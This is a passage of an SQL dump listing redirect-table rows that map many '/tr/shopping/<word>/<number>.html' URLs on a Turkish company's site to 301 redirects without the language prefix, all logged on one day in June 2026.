00:00:00',301),(71173,'https://3s-technologies.com.tr/tr/shopping/selforiginating/2015770623.html',NULL,'https://3s-technologies.com.tr/shopping/selforiginating/2015770623.html','',1,0,'2026-06-11 03:07:42','0000-00-00 00:00:00',301),(71174,'https://3s-technologies.com.tr/tr/shopping/improvisatrice/413854510.html',NULL,'https://3s-technologies.com.tr/shopping/improvisatrice/413854510.html','',1,0,'2026-06-11 03:07:46','0000-00-00 00:00:00',301),(71175,'https://3s-technologies.com.tr/tr/shopping/suckfish/2772080809.html',NULL,'https://3s-technologies.com.tr/shopping/suckfish/2772080809.html','',1,0,'2026-06-11 03:07:49','0000-00-00 00:00:00',301),(71176,'https://3s-technologies.com.tr/tr/shopping/blastostyle/1564908043.html',NULL,'https://3s-technologies.com.tr/shopping/blastostyle/1564908043.html','',1,0,'2026-06-11 03:07:52','0000-00-00 00:00:00',301),(71177,'https://3s-technologies.com.tr/tr/shopping/corroval/538757177.html',NULL,'https://3s-technologies.com.tr/shopping/corroval/538757177.html','',1,0,'2026-06-11 03:08:04','0000-00-00 00:00:00',301),(71178,'https://3s-technologies.com.tr/tr/shopping/panoramic/2380035557.html',NULL,'https://3s-technologies.com.tr/shopping/panoramic/2380035557.html','',1,0,'2026-06-11 03:08:07','0000-00-00 00:00:00',301),(71179,'https://3s-technologies.com.tr/tr/shopping/chachacha/2811888570.html',NULL,'https://3s-technologies.com.tr/shopping/chachacha/2811888570.html','',1,0,'2026-06-11 03:08:10','0000-00-00 00:00:00',301),(71180,'https://3s-technologies.com.tr/tr/shopping/wallaba/3999470247.html',NULL,'https://3s-technologies.com.tr/shopping/wallaba/3999470247.html','',1,0,'2026-06-11 03:08:13','0000-00-00 00:00:00',301),(71181,'https://3s-technologies.com.tr/tr/shopping/reddest/2389311981.html',NULL,'https://3s-technologies.com.tr/shopping/reddest/2389311981.html','',1,0,'2026-06-11 03:08:16','0000-00-00 00:00:00',301),(71182,'https://3s-technologies.com.tr/tr/shopping/midjune/2149735069.html',NULL,'https://3s-technologies.com.tr/shopping/midjune/2149735069.html','',1,0,'2026-06-11 03:08:19','0000-00-00 00:00:00',301),(71183,'https://3s-technologies.com.tr/tr/shopping/sickerly/3698624011.html',NULL,'https://3s-technologies.com.tr/shopping/sickerly/3698624011.html','',1,0,'2026-06-11 03:08:25','0000-00-00 00:00:00',301),(71184,'https://3s-technologies.com.tr/tr/shopping/eclipsed/3241576549.html',NULL,'https://3s-technologies.com.tr/shopping/eclipsed/3241576549.html','',1,0,'2026-06-11 03:08:27','0000-00-00 00:00:00',301),(71185,'https://3s-technologies.com.tr/tr/shopping/weils/4208583583.html',NULL,'https://3s-technologies.com.tr/shopping/weils/4208583583.html','',1,0,'2026-06-11 03:08:30','0000-00-00 00:00:00',301),(71186,'https://3s-technologies.com.tr/tr/shopping/matthiola/3550804654.html',NULL,'https://3s-technologies.com.tr/shopping/matthiola/3550804654.html','',1,0,'2026-06-11 03:08:33','0000-00-00 00:00:00',301),(71187,'https://3s-technologies.com.tr/tr/shopping/ulula/3501115535.html',NULL,'https://3s-technologies.com.tr/shopping/ulula/3501115535.html','',1,0,'2026-06-11 03:08:36','0000-00-00 00:00:00',301),(71188,'https://3s-technologies.com.tr/tr/shopping/coercive/822388059.html',NULL,'https://3s-technologies.com.tr/shopping/coercive/822388059.html','',1,0,'2026-06-11 03:08:49','0000-00-00 00:00:00',301),(71189,'https://3s-technologies.com.tr/tr/shopping/cauterized/941889131.html',NULL,'https://3s-technologies.com.tr/shopping/cauterized/941889131.html','',1,0,'2026-06-11 03:08:51','0000-00-00 00:00:00',301),(71190,'https://3s-technologies.com.tr/tr/shopping/testudinate/625270333.html',NULL,'https://3s-technologies.com.tr/shopping/testudinate/625270333.html','',1,0,'2026-06-11 03:08:54','0000-00-00 00:00:00',301),(71191,'https://3s-technologies.com.tr/tr/shopping/evacate/2734044705.html',NULL,'https://3s-technologies.com.tr/shopping/evacate/2734044705.html','',1,0,'2026-06-11 03:08:57','0000-00-00 00:00:00',301),(71192,'https://3s-technologies.com.tr/tr/shopping/whistly/775007754.html',NULL,'https://3s-technologies.com.tr/shopping/whistly/775007754.html','',1,0,'2026-06-11 03:09:00','0000-00-00 00:00:00',301),(71193,'https://3s-technologies.com.tr/tr/shopping/electroplater/3935246291.html',NULL,'https://3s-technologies.com.tr/shopping/electroplater/3935246291.html','',1,0,'2026-06-11 03:09:03','0000-00-00 00:00:00',301),(71194,'https://3s-technologies.com.tr/tr/shopping/dropkicker/425736919.html',NULL,'https://3s-technologies.com.tr/shopping/dropkicker/425736919.html','',1,0,'2026-06-11 03:09:08','0000-00-00 00:00:00',301),(71195,'https://3s-technologies.com.tr/tr/shopping/torrefaction/230666671.html',NULL,'https://3s-technologies.com.tr/shopping/torrefaction/230666671.html','',1,0,'2026-06-11 03:09:11','0000-00-00 00:00:00',301),(71196,'https://3s-technologies.com.tr/tr/shopping/platted/2112786607.html',NULL,'https://3s-technologies.com.tr/shopping/platted/2112786607.html','',1,0,'2026-06-11 03:09:13','0000-00-00 00:00:00',301),(71197,'https://3s-technologies.com.tr/tr/shopping/multicellular/3739643871.html',NULL,'https://3s-technologies.com.tr/shopping/multicellular/3739643871.html','',1,0,'2026-06-11 03:09:17','0000-00-00 00:00:00',301),(71198,'https://3s-technologies.com.tr/tr/shopping/fencer/13314252.html',NULL,'https://3s-technologies.com.tr/shopping/fencer/13314252.html','',1,0,'2026-06-11 03:09:20','0000-00-00 00:00:00',301),(71199,'https://3s-technologies.com.tr/tr/shopping/mephila/3945127665.html',NULL,'https://3s-technologies.com.tr/shopping/mephila/3945127665.html','',1,0,'2026-06-11 03:09:22','0000-00-00 00:00:00',301),(71200,'https://3s-technologies.com.tr/tr/shopping/pompilus/3717536490.html',NULL,'https://3s-technologies.com.tr/shopping/pompilus/3717536490.html','',1,0,'2026-06-11 03:09:54','0000-00-00 00:00:00',301),(71201,'https://3s-technologies.com.tr/tr/shopping/intermured/3293331442.html',NULL,'https://3s-technologies.com.tr/shopping/intermured/3293331442.html','',1,0,'2026-06-11 03:09:58','0000-00-00 00:00:00',301),(71202,'https://3s-technologies.com.tr/tr/shopping/witing/4072594198.html',NULL,'https://3s-technologies.com.tr/shopping/witing/4072594198.html','',1,0,'2026-06-11 03:10:01','0000-00-00 00:00:00',301),(71203,'https://3s-technologies.com.tr/tr/shopping/convolvulus/2569074653.html',NULL,'https://3s-technologies.com.tr/shopping/convolvulus/2569074653.html','',1,0,'2026-06-11 03:10:04','0000-00-00 00:00:00',301),(71204,'https://3s-technologies.com.tr/tr/shopping/chelated/2238245301.html',NULL,'https://3s-technologies.com.tr/shopping/chelated/2238245301.html','',1,0,'2026-06-11 03:10:07','0000-00-00 00:00:00',301),(71205,'https://3s-technologies.com.tr/tr/shopping/classicistic/726319604.html',NULL,'https://3s-technologies.com.tr/shopping/classicistic/726319604.html','',1,0,'2026-06-11 03:10:10','0000-00-00 00:00:00',301),(71206,'https://3s-technologies.com.tr/tr/shopping/causative/118130978.html',NULL,'https://3s-technologies.com.tr/shopping/causative/118130978.html','',1,0,'2026-06-11 03:10:14','0000-00-00 00:00:00',301),(71207,'https://3s-technologies.com.tr/tr/shopping/defeatured/4136671715.html',NULL,'https://3s-technologies.com.tr/shopping/defeatured/4136671715.html','',1,0,'2026-06-11 03:10:17','0000-00-00 00:00:00',301),(71208,'https://3s-technologies.com.tr/tr/shopping/multipolar/1038905115.html',NULL,'https://3s-technologies.com.tr/shopping/multipolar/1038905115.html','',1,0,'2026-06-11 03:10:20','0000-00-00 00:00:00',301),(71209,'https://3s-technologies.com.tr/tr/shopping/alcoholometer/308495326.html',NULL,'https://3s-technologies.com.tr/shopping/alcoholometer/308495326.html','',1,0,'2026-06-11 03:10:23','0000-00-00 00:00:00',301),(71210,'https://3s-technologies.com.tr/tr/shopping/conditioned/2979982046.html',NULL,'https://3s-technologies.com.tr/shopping/conditioned/2979982046.html','',1,0,'2026-06-11 03:10:29','0000-00-00 00:00:00',301),(71211,'https://3s-technologies.com.tr/tr/shopping/catalog/4094276233.html',NULL,'https://3s-technologies.com.tr/shopping/catalog/4094276233.html','',1,0,'2026-06-11 03:10:31','0000-00-00 00:00:00',301),(71212,'https://3s-technologies.com.tr/tr/shopping/dizzard/530717184.html',NULL,'https://3s-technologies.com.tr/shopping/dizzard/530717184.html','',1,0,'2026-06-11 03:10:35','0000-00-00 00:00:00',301),(71213,'https://3s-technologies.com.tr/tr/shopping/shoving/310659916.html',NULL,'https://3s-technologies.com.tr/shopping/shoving/310659916.html','',1,0,'2026-06-11 03:10:37','0000-00-00 00:00:00',301),(71214,'https://3s-technologies.com.tr/tr/shopping/hennery/3979787080.html',NULL,'https://3s-technologies.com.tr/shopping/hennery/3979787080.html','',1,0,'2026-06-11 03:10:41','0000-00-00 00:00:00',301),(71215,'https://3s-technologies.com.tr/tr/shopping/conium/724041845.html',NULL,'https://3s-technologies.com.tr/shopping/conium/724041845.html','',1,0,'2026-06-11 03:10:48','0000-00-00 00:00:00',301),(71216,'https://3s-technologies.com.tr/tr/shopping/detracting/1325837249.html',NULL,'https://3s-technologies.com.tr/shopping/detracting/1325837249.html','',1,0,'2026-06-11 03:10:51','0000-00-00 00:00:00',301),(71217,'https://3s-technologies.com.tr/tr/shopping/nutria/4222626639.html',NULL,'https://3s-technologies.com.tr/shopping/nutria/4222626639.html','',1,0,'2026-06-11 03:10:54','0000-00-00 00:00:00',301),(71218,'https://3s-technologies.com.tr/tr/shopping/mesmeree/2417779775.html',NULL,'https://3s-technologies.com.tr/shopping/mesmeree/2417779775.html','',1,0,'2026-06-11 03:10:56','0000-00-00 00:00:00',301),(71219,'https://3s-technologies.com.tr/tr/shopping/laplander/4007712432.html',NULL,'https://3s-technologies.com.tr/shopping/laplander/4007712432.html','',1,0,'2026-06-11 03:11:00','0000-00-00 00:00:00',301),(71220,'https://3s-technologies.com.tr/tr/shopping/steven/1016356307.html',NULL,'https://3s-technologies.com.tr/shopping/steven/1016356307.html','',1,0,'2026-06-11 03:11:06','0000-00-00 00:00:00',301),(71221,'https://3s-technologies.com.tr/tr/shopping/professorial/4126166140.html',NULL,'https://3s-technologies.com.tr/shopping/professorial/4126166140.html','',1,0,'2026-06-11 03:11:09','0000-00-00 00:00:00',301),(71222,'https://3s-technologies.com.tr/tr/shopping/ligulas/1923078857.html',NULL,'https://3s-technologies.com.tr/shopping/ligulas/1923078857.html','',1,0,'2026-06-11 03:11:12','0000-00-00 00:00:00',301),(71223,'https://3s-technologies.com.tr/tr/shopping/oldhat/1909477244.html',NULL,'https://3s-technologies.com.tr/shopping/oldhat/1909477244.html','',1,0,'2026-06-11 03:11:53','0000-00-00 00:00:00',301),(71224,'https://3s-technologies.com.tr/tr/shopping/wisehearted/1428918674.html',NULL,'https://3s-technologies.com.tr/shopping/wisehearted/1428918674.html','',1,0,'2026-06-11 03:11:56','0000-00-00 00:00:00',301),(71225,'https://3s-technologies.com.tr/tr/shopping/obcompressed/1061012480.html',NULL,'https://3s-technologies.com.tr/shopping/obcompressed/1061012480.html','',1,0,'2026-06-11 03:11:59','0000-00-00 00:00:00',301),(71226,'https://3s-technologies.com.tr/tr/shopping/pinite/614436468.html',NULL,'https://3s-technologies.com.tr/shopping/pinite/614436468.html','',1,0,'2026-06-11 03:12:02','0000-00-00 00:00:00',301),(71227,'https://3s-technologies.com.tr/tr/shopping/grinder/787838711.html',NULL,'https://3s-technologies.com.tr/shopping/grinder/787838711.html','',1,0,'2026-06-11 03:12:05','0000-00-00 00:00:00',301),(71228,'https://3s-technologies.com.tr/tr/shopping/tendered/2176872633.html',NULL,'https://3s-technologies.com.tr/shopping/tendered/2176872633.html','',1,0,'2026-06-11 03:12:12','0000-00-00 00:00:00',301),(71229,'https://3s-technologies.com.tr/tr/shopping/wagonage/2159076152.html',NULL,'https://3s-technologies.com.tr/shopping/wagonage/2159076152.html','',1,0,'2026-06-11 03:12:17','0000-00-00 00:00:00',301),(71230,'https://3s-technologies.com.tr/tr/shopping/nonbituminous/3665176663.html',NULL,'https://3s-technologies.com.tr/shopping/nonbituminous/3665176663.html','',1,0,'2026-06-11 03:12:20','0000-00-00 00:00:00',301),(71231,'https://3s-technologies.com.tr/tr/shopping/eudemon/2480299851.html',NULL,'https://3s-technologies.com.tr/shopping/eudemon/2480299851.html','',1,0,'2026-06-11 03:12:22','0000-00-00 00:00:00',301),(71232,'https://3s-technologies.com.tr/tr/shopping/butch/3914514548.html',NULL,'https://3s-technologies.com.tr/shopping/butch/3914514548.html','',1,0,'2026-06-11 03:12:26','0000-00-00 00:00:00',301),(71233,'https://3s-technologies.com.tr/tr/shopping/fruitlessly/2954056549.html',NULL,'https://3s-technologies.com.tr/shopping/fruitlessly/2954056549.html','',1,0,'2026-06-11 03:12:32','0000-00-00 00:00:00',301),(71234,'https://3s-technologies.com.tr/tr/shopping/pterodactyl/2332545185.html',NULL,'https://3s-technologies.com.tr/shopping/pterodactyl/2332545185.html','',1,0,'2026-06-11 03:12:34','0000-00-00 00:00:00',301),(71235,'https://3s-technologies.com.tr/tr/shopping/baenosome/1730713458.html',NULL,'https://3s-technologies.com.tr/shopping/baenosome/1730713458.html','',1,0,'2026-06-11 03:12:37','0000-00-00 00:00:00',301),(71236,'https://3s-technologies.com.tr/tr/shopping/canner/3222404462.html',NULL,'https://3s-technologies.com.tr/shopping/canner/3222404462.html','',1,0,'2026-06-11 03:12:40','0000-00-00 00:00:00',301),(71237,'https://3s-technologies.com.tr/tr/shopping/etheria/965390414.html',NULL,'https://3s-technologies.com.tr/shopping/etheria/965390414.html','',1,0,'2026-06-11 03:12:43','0000-00-00 00:00:00',301),(71238,'https://3s-technologies.com.tr/tr/shopping/unaidable/4267628122.html',NULL,'https://3s-technologies.com.tr/shopping/unaidable/4267628122.html','',1,0,'2026-06-11 03:12:50','0000-00-00 00:00:00',301),(71239,'https://3s-technologies.com.tr/tr/shopping/estrich/540132815.html',NULL,'https://3s-technologies.com.tr/shopping/estrich/540132815.html','',1,0,'2026-06-11 03:12:55','0000-00-00 00:00:00',301),(71240,'https://3s-technologies.com.tr/tr/shopping/ephah/165821229.html',NULL,'https://3s-technologies.com.tr/shopping/ephah/165821229.html','',1,0,'2026-06-11 03:12:58','0000-00-00 00:00:00',301),(71241,'https://3s-technologies.com.tr/tr/shopping/spuming/386339191.html',NULL,'https://3s-technologies.com.tr/shopping/spuming/386339191.html','',1,0,'2026-06-11 03:13:01','0000-00-00 00:00:00',301),(71242,'https://3s-technologies.com.tr/tr/shopping/estrange/2235821119.html',NULL,'https://3s-technologies.com.tr/shopping/estrange/2235821119.html','',1,0,'2026-06-11 03:13:11','0000-00-00 00:00:00',301),(71243,'https://3s-technologies.com.tr/tr/shopping/threeflowered/1379000129.html',NULL,'https://3s-technologies.com.tr/shopping/threeflowered/1379000129.html','',1,0,'2026-06-11 03:13:16','0000-00-00 00:00:00',301),(71244,'https://3s-technologies.com.tr/tr/shopping/diseasing/1460597435.html',NULL,'https://3s-technologies.com.tr/shopping/diseasing/1460597435.html','',1,0,'2026-06-11 03:13:19','0000-00-00 00:00:00',301),(71245,'https://3s-technologies.com.tr/tr/shopping/retrocopulation/62722720.html',NULL,'https://3s-technologies.com.tr/shopping/retrocopulation/62722720.html','',1,0,'2026-06-11 03:13:22','0000-00-00 00:00:00',301),(71246,'https://3s-technologies.com.tr/tr/shopping/apathistical/3781230044.html',NULL,'https://3s-technologies.com.tr/shopping/apathistical/3781230044.html','',1,0,'2026-06-11 03:13:25','0000-00-00 00:00:00',301),(71247,'https://3s-technologies.com.tr/tr/shopping/muringer/924876672.html',NULL,'https://3s-technologies.com.tr/shopping/muringer/924876672.html','',1,0,'2026-06-11 03:13:28','0000-00-00 00:00:00',301),(71248,'https://3s-technologies.com.tr/tr/shopping/unctuosity/729859816.html',NULL,'https://3s-technologies.com.tr/shopping/unctuosity/729859816.html','',1,0,'2026-06-11 03:13:31','0000-00-00 00:00:00',301),(71249,'https://3s-technologies.com.tr/tr/shopping/coreus/1849954906.html',NULL,'https://3s-technologies.com.tr/shopping/coreus/1849954906.html','',1,0,'2026-06-11 03:13:34','0000-00-00 00:00:00',301),(71250,'https://3s-technologies.com.tr/tr/shopping/ocularly/752736882.html',NULL,'https://3s-technologies.com.tr/shopping/ocularly/752736882.html','',1,0,'2026-06-11 03:13:37','0000-00-00 00:00:00',301),(71251,'https://3s-technologies.com.tr/tr/shopping/excel/2937207629.html',NULL,'https://3s-technologies.com.tr/shopping/excel/2937207629.html','',1,0,'2026-06-11 03:13:40','0000-00-00 00:00:00',301),(71252,'https://3s-technologies.com.tr/tr/shopping/smithsonite/2873130112.html',NULL,'https://3s-technologies.com.tr/shopping/smithsonite/2873130112.html','',1,0,'2026-06-11 03:13:54','0000-00-00 00:00:00',301),(71253,'https://3s-technologies.com.tr/tr/shopping/headily/1445852995.html',NULL,'https://3s-technologies.com.tr/shopping/headily/1445852995.html','',1,0,'2026-06-11 03:13:57','0000-00-00 00:00:00',301),(71254,'https://3s-technologies.com.tr/tr/shopping/shelf/2160141812.html',NULL,'https://3s-technologies.com.tr/shopping/shelf/2160141812.html','',1,0,'2026-06-11 03:13:59','0000-00-00 00:00:00',301),(71255,'https://3s-technologies.com.tr/tr/shopping/asternal/962849088.html',NULL,'https://3s-technologies.com.tr/shopping/asternal/962849088.html','',1,0,'2026-06-11 03:14:02','0000-00-00 00:00:00',301),(71256,'https://3s-technologies.com.tr/tr/shopping/clothe/693428744.html',NULL,'https://3s-technologies.com.tr/shopping/clothe/693428744.html','',1,0,'2026-06-11 03:14:05','0000-00-00 00:00:00',301),(71257,'https://3s-technologies.com.tr/tr/shopping/spelt/1542013893.html',NULL,'https://3s-technologies.com.tr/shopping/spelt/1542013893.html','',1,0,'2026-06-11 03:14:27','0000-00-00 00:00:00',301),(71258,'https://3s-technologies.com.tr/tr/shopping/fernticle/647377698.html',NULL,'https://3s-technologies.com.tr/shopping/fernticle/647377698.html','',1,0,'2026-06-11 03:14:30','0000-00-00 00:00:00',301),(71259,'https://3s-technologies.com.tr/tr/shopping/ranty/4121577336.html',NULL,'https://3s-technologies.com.tr/shopping/ranty/4121577336.html','',1,0,'2026-06-11 03:14:33','0000-00-00 00:00:00',301),(71260,'https://3s-technologies.com.tr/tr/shopping/tetanus/1109416262.html',NULL,'https://3s-technologies.com.tr/shopping/tetanus/1109416262.html','',1,0,'2026-06-11 03:14:36','0000-00-00 00:00:00',301),(71261,'https://3s-technologies.com.tr/tr/shopping/despair/557816127.html',NULL,'https://3s-technologies.com.tr/shopping/despair/557816127.html','',1,0,'2026-06-11 03:14:39','0000-00-00 00:00:00',301),(71262,'https://3s-technologies.com.tr/tr/shopping/panacea/2605342186.html',NULL,'https://3s-technologies.com.tr/shopping/panacea/2605342186.html','',1,0,'2026-06-11 03:14:42','0000-00-00 00:00:00',301),(71263,'https://3s-technologies.com.tr/tr/shopping/precipitable/2261681893.html',NULL,'https://3s-technologies.com.tr/shopping/precipitable/2261681893.html','',1,0,'2026-06-11 03:14:45','0000-00-00 00:00:00',301),(71264,'https://3s-technologies.com.tr/tr/shopping/noncombatant/459626665.html',NULL,'https://3s-technologies.com.tr/shopping/noncombatant/459626665.html','',1,0,'2026-06-11 03:14:48','0000-00-00 00:00:00',301),(71265,'https://3s-technologies.com.tr/tr/shopping/prospectiveness/1839989574.html',NULL,'https://3s-technologies.com.tr/shopping/prospectiveness/1839989574.html','',1,0,'2026-06-11 03:14:51','0000-00-00 00:00:00',301),(71266,'https://3s-technologies.com.tr/tr/shopping/spary/78323217.html',NULL,'https://3s-technologies.com.tr/shopping/spary/78323217.html','',1,0,'2026-06-11 03:14:54','0000-00-00 00:00:00',301),(71267,'https://3s-technologies.com.tr/tr/shopping/aitchbone/3421845355.html',NULL,'https://3s-technologies.com.tr/shopping/aitchbone/3421845355.html','',1,0,'2026-06-11 03:14:59','0000-00-00 00:00:00',301),(71268,'https://3s-technologies.com.tr/tr/shopping/exitomotory/2129093085.html',NULL,'https://3s-technologies.com.tr/shopping/exitomotory/2129093085.html','',1,0,'2026-06-11 03:15:01','0000-00-00 00:00:00',301),(71269,'https://3s-technologies.com.tr/tr/shopping/epanthous/1381001196.html',NULL,'https://3s-technologies.com.tr/shopping/epanthous/1381001196.html','',1,0,'2026-06-11 03:15:04','0000-00-00 00:00:00',301),(71270,'https://3s-technologies.com.tr/tr/shopping/eachwhere/3895438546.html',NULL,'https://3s-technologies.com.tr/shopping/eachwhere/3895438546.html','',1,0,'2026-06-11 03:15:07','0000-00-00 00:00:00',301),(71271,'https://3s-technologies.com.tr/tr/shopping/ashgray/2231215247.html',NULL,'https://3s-technologies.com.tr/shopping/ashgray/2231215247.html','',1,0,'2026-06-11 03:15:10','0000-00-00 00:00:00',301),(71272,'https://3s-technologies.com.tr/tr/shopping/connecter/814259043.html',NULL,'https://3s-technologies.com.tr/shopping/connecter/814259043.html','',1,0,'2026-06-11 03:15:13','0000-00-00 00:00:00',301),(71273,'https://3s-technologies.com.tr/tr/shopping/scapus/2135959632.html',NULL,'https://3s-technologies.com.tr/shopping/scapus/2135959632.html','',1,0,'2026-06-11 03:15:16','0000-00-00 00:00:00',301),(71274,'https://3s-technologies.com.tr/tr/shopping/papules/307283227.html',NULL,'https://3s-technologies.com.tr/shopping/papules/307283227.html','',1,0,'2026-06-11 03:15:19','0000-00-00 00:00:00',301),(71275,'https://3s-technologies.com.tr/tr/shopping/twaite/3481153461.html',NULL,'https://3s-technologies.com.tr/shopping/twaite/3481153461.html','',1,0,'2026-06-11 03:15:22','0000-00-00 00:00:00',301),(71276,'https://3s-technologies.com.tr/tr/shopping/uniform/746935995.html',NULL,'https://3s-technologies.com.tr/shopping/uniform/746935995.html','',1,0,'2026-06-11 03:15:25','0000-00-00 00:00:00',301),(71277,'https://3s-technologies.com.tr/tr/shopping/monas/94957953.html',NULL,'https://3s-technologies.com.tr/shopping/monas/94957953.html','',1,0,'2026-06-11 03:15:31','0000-00-00 00:00:00',301),(71278,'https://3s-technologies.com.tr/tr/shopping/overfullness/254351794.html',NULL,'https://3s-technologies.com.tr/shopping/overfullness/254351794.html','',1,0,'2026-06-11 03:15:36','0000-00-00 00:00:00',301),(71279,'https://3s-technologies.com.tr/tr/shopping/isonitroso/4240903824.html',NULL,'https://3s-technologies.com.tr/shopping/isonitroso/4240903824.html','',1,0,'2026-06-11 03:15:38','0000-00-00 00:00:00',301),(71280,'https://3s-technologies.com.tr/tr/shopping/distillable/1247965191.html',NULL,'https://3s-technologies.com.tr/shopping/distillable/1247965191.html','',1,0,'2026-06-11 03:15:42','0000-00-00 00:00:00',301),(71281,'https://3s-technologies.com.tr/tr/shopping/elementalism/2628580936.html',NULL,'https://3s-technologies.com.tr/shopping/elementalism/2628580936.html','',1,0,'2026-06-11 03:15:45','0000-00-00 00:00:00',301),(71282,'https://3s-technologies.com.tr/tr/shopping/misadventured/2809809004.html',NULL,'https://3s-technologies.com.tr/shopping/misadventured/2809809004.html','',1,0,'2026-06-11 03:15:48','0000-00-00 00:00:00',301),(71283,'https://3s-technologies.com.tr/tr/shopping/divaricately/3046568769.html',NULL,'https://3s-technologies.com.tr/shopping/divaricately/3046568769.html','',1,0,'2026-06-11 03:15:51','0000-00-00 00:00:00',301),(71284,'https://3s-technologies.com.tr/tr/shopping/thickwinded/4118285655.html',NULL,'https://3s-technologies.com.tr/shopping/thickwinded/4118285655.html','',1,0,'2026-06-11 03:15:54','0000-00-00 00:00:00',301),(71285,'https://3s-technologies.com.tr/tr/shopping/linking/3747022500.html',NULL,'https://3s-technologies.com.tr/shopping/linking/3747022500.html','',1,0,'2026-06-11 03:15:57','0000-00-00 00:00:00',301),(71286,'https://3s-technologies.com.tr/tr/shopping/punctata/2424809829.html',NULL,'https://3s-technologies.com.tr/shopping/punctata/2424809829.html','',1,0,'2026-06-11 03:16:00','0000-00-00 00:00:00',301),(71287,'https://3s-technologies.com.tr/tr/shopping/screenings/1695775136.html',NULL,'https://3s-technologies.com.tr/shopping/screenings/1695775136.html','',1,0,'2026-06-11 03:16:03','0000-00-00 00:00:00',301),(71288,'https://3s-technologies.com.tr/tr/shopping/symphyseal/2700929239.html',NULL,'https://3s-technologies.com.tr/shopping/symphyseal/2700929239.html','',1,0,'2026-06-11 03:16:07','0000-00-00 00:00:00',301),(71289,'https://3s-technologies.com.tr/tr/shopping/kayaker/1479596289.html',NULL,'https://3s-technologies.com.tr/shopping/kayaker/1479596289.html','',1,0,'2026-06-11 03:16:09','0000-00-00 00:00:00',301),(71290,'https://3s-technologies.com.tr/tr/shopping/firecrest/4160517630.html',NULL,'https://3s-technologies.com.tr/shopping/firecrest/4160517630.html','',1,0,'2026-06-11 03:16:12','0000-00-00 00:00:00',301),(71291,'https://3s-technologies.com.tr/tr/shopping/scumbled/1698053681.html',NULL,'https://3s-technologies.com.tr/shopping/scumbled/1698053681.html','',1,0,'2026-06-11 03:16:15','0000-00-00 00:00:00',301),(71292,'https://3s-technologies.com.tr/tr/shopping/shelduck/1005542775.html',NULL,'https://3s-technologies.com.tr/shopping/shelduck/1005542775.html','',1,0,'2026-06-11 03:16:18','0000-00-00 00:00:00',301),(71293,'https://3s-technologies.com.tr/tr/shopping/subtraction/1054084486.html',NULL,'https://3s-technologies.com.tr/shopping/subtraction/1054084486.html','',1,0,'2026-06-11 03:16:21','0000-00-00 00:00:00',301),(71294,'https://3s-technologies.com.tr/tr/shopping/ranunculus/153024926.html',NULL,'https://3s-technologies.com.tr/shopping/ranunculus/153024926.html','',1,0,'2026-06-11 03:16:24','0000-00-00 00:00:00',301),(71295,'https://3s-technologies.com.tr/tr/shopping/defacement/2330465587.html',NULL,'https://3s-technologies.com.tr/shopping/defacement/2330465587.html','',1,0,'2026-06-11 03:16:27','0000-00-00 00:00:00',301),(71296,'https://3s-technologies.com.tr/tr/shopping/luscus/2827723600.html',NULL,'https://3s-technologies.com.tr/shopping/luscus/2827723600.html','',1,0,'2026-06-11 03:16:30','0000-00-00 00:00:00',301),(71297,'https://3s-technologies.com.tr/tr/shopping/outparamour/1729963103.html',NULL,'https://3s-technologies.com.tr/shopping/outparamour/1729963103.html','',1,0,'2026-06-11 03:16:33','0000-00-00 00:00:00',301),(71298,'https://3s-technologies.com.tr/tr/shopping/beaux/1047917940.html',NULL,'https://3s-technologies.com.tr/shopping/beaux/1047917940.html','',1,0,'2026-06-11 03:16:40','0000-00-00 00:00:00',301),(71299,'https://3s-technologies.com.tr/tr/shopping/welshman/727531703.html',NULL,'https://3s-technologies.com.tr/shopping/welshman/727531703.html','',1,0,'2026-06-11 03:16:43','0000-00-00 00:00:00',301),(71300,'https://3s-technologies.com.tr/tr/shopping/coprose/500204127.html',NULL,'https://3s-technologies.com.tr/shopping/coprose/500204127.html','',1,0,'2026-06-11 03:16:46','0000-00-00 00:00:00',301),(71301,'https://3s-technologies.com.tr/tr/shopping/moorgame/4237278604.html',NULL,'https://3s-technologies.com.tr/shopping/moorgame/4237278604.html','',1,0,'2026-06-11 03:16:49','0000-00-00 00:00:00',301),(71302,'https://3s-technologies.com.tr/tr/shopping/austral/2386887767.html',NULL,'https://3s-technologies.com.tr/shopping/austral/2386887767.html','',1,0,'2026-06-11 03:16:51','0000-00-00 00:00:00',301),(71303,'https://3s-technologies.com.tr/tr/shopping/ssive/641296160.html',NULL,'https://3s-technologies.com.tr/shopping/ssive/641296160.html','',1,0,'2026-06-11 03:16:55','0000-00-00 00:00:00',301),(71304,'https://3s-technologies.com.tr/tr/shopping/spermatoon/3734891544.html',NULL,'https://3s-technologies.com.tr/shopping/spermatoon/3734891544.html','',1,0,'2026-06-11 03:16:58','0000-00-00 00:00:00',301),(71305,'https://3s-technologies.com.tr/tr/shopping/graves/826109348.html',NULL,'https://3s-technologies.com.tr/shopping/graves/826109348.html','',1,0,'2026-06-11 03:17:00','0000-00-00 00:00:00',301),(71306,'https://3s-technologies.com.tr/tr/shopping/oriental/627779523.html',NULL,'https://3s-technologies.com.tr/shopping/oriental/627779523.html','',1,0,'2026-06-11 03:17:04','0000-00-00 00:00:00',301),(71307,'https://3s-technologies.com.tr/tr/shopping/deplorability/2291525325.html',NULL,'https://3s-technologies.com.tr/shopping/deplorability/2291525325.html','',1,0,'2026-06-11 03:17:08','0000-00-00 00:00:00',301),(71308,'https://3s-technologies.com.tr/tr/shopping/misconsecrate/3536334508.html',NULL,'https://3s-technologies.com.tr/shopping/misconsecrate/3536334508.html','',1,0,'2026-06-11 03:17:11','0000-00-00 00:00:00',301),(71309,'https://3s-technologies.com.tr/tr/shopping/exacter/2626907093.html',NULL,'https://3s-technologies.com.tr/shopping/exacter/2626907093.html','',1,0,'2026-06-11 03:17:14','0000-00-00 00:00:00',301),(71310,'https://3s-technologies.com.tr/tr/shopping/charade/1188635765.html',NULL,'https://3s-technologies.com.tr/shopping/charade/1188635765.html','',1,0,'2026-06-11 03:17:17','0000-00-00 00:00:00',301),(71311,'https://3s-technologies.com.tr/tr/shopping/runic/1873715797.html',NULL,'https://3s-technologies.com.tr/shopping/runic/1873715797.html','',1,0,'2026-06-11 03:17:21','0000-00-00 00:00:00',301),(71312,'https://3s-technologies.com.tr/tr/shopping/calumniatory/2570286752.html',NULL,'https://3s-technologies.com.tr/shopping/calumniatory/2570286752.html','',1,0,'2026-06-11 03:17:24','0000-00-00 00:00:00',301),(71313,'https://3s-technologies.com.tr/tr/shopping/burchellii/2268858418.html',NULL,'https://3s-technologies.com.tr/shopping/burchellii/2268858418.html','',1,0,'2026-06-11 03:17:26','0000-00-00 00:00:00',301),(71314,'https://3s-technologies.com.tr/tr/shopping/seismometry/3249542026.html',NULL,'https://3s-technologies.com.tr/shopping/seismometry/3249542026.html','',1,0,'2026-06-11 